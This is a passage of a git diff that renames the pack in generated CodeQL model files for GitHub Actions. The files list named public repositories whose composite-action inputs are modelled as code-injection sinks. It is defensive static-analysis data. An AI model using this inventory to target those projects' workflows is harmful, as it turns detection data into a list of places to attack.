addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9db70f02db4e..50af2e33e162 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 8cea15ac9e11..679b362ba3f1 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 766ec5155517..8e11db68c85e 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index 13ee2f4e7a87..deed2d125737 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index 0cf05c2273bd..353cb30683b0 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 7f2622feecd8..25522a67b69a 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 3aa8c3bc6495..c545ad6844ef 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index b79317db9c8a..941710eb0fe2 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 843e0d20b98a..75b744fc036b 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 2a0fd3ac371d..7a4ea3514ba4 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 3ef29cc9b84f..25a25d085ad1 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 71d2012eb029..23bd58d66cba 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index a67aeb905958..1849ad0e2f56 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 1f5dd108f910..c4861c77842b 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index ea4a2a2a3c76..b11931b54086 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 29973ccdbd74..1b3fffbe8693 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 2db70ffea663..df6f6088087d 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 8a4273e8cafd..89c10bd95c22 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index de09b35f1d46..4a471b5a97cf 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 91e6268e6140..9f2448a6d752 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 777212d9a0a6..dc8a362dc964 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8cc0ab83a420..a1f2ccb164e7 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index f1244bdd5dec..303f9d56cb22 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 37814510c8c4..2f28cf86431c 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 48e40c36beaa..efbcceb48f56 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 0edb2c5f8cdc..649fac9fede6 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 61210d17abb9..3623fe51e843 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 22dc1a406293..d730cdb6a990 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index b2888b571a8a..bcec913ef7c5 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index bc188d91f1bb..ad5ec2e544fc 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d5defe67401e..9c5c38007bc3 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index d97fedbed130..8899c0563e8e 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index e22c29b09f11..f71c818a337e 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 7203bb8345c6..989eca719606 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index dcfbb0ea2032..2666233ac877 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 6c5d6edd572c..e8aa6be8fa6a 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index fdaee61066ed..9bd167413532 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index d68c4e57c8ad..3c50e297eb5e 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 85a8d2f4d65d..d1c181a87075 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index d22754092787..5b600a4cad42 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 4dc0b87214b3..65fdcb11a008 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index ea1a8a8afecb..08c3ff9cf438 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 5ce00c29e52b..c06978549fb9 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index d1f551b66da3..eaca3fb9c62b 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 6f8845ec1c0a..e1c608d3e105 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 152fdfed4477..dc1f7a7b3b88 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 5919ade7e819..a80ce46abc59 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index d9afa5bb21fe..15886c2c945d 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 0b36853a8914..45769a727d8b 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 2bd521d42f58..9f85415a4825 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 8ae81e706a42..bbfb20551afc 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 4893772b71ae..f8dc63ee029e 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index e174c830a855..5ad65dcc0bdb 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 14070215bfa3..90b6b38b6b01 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ 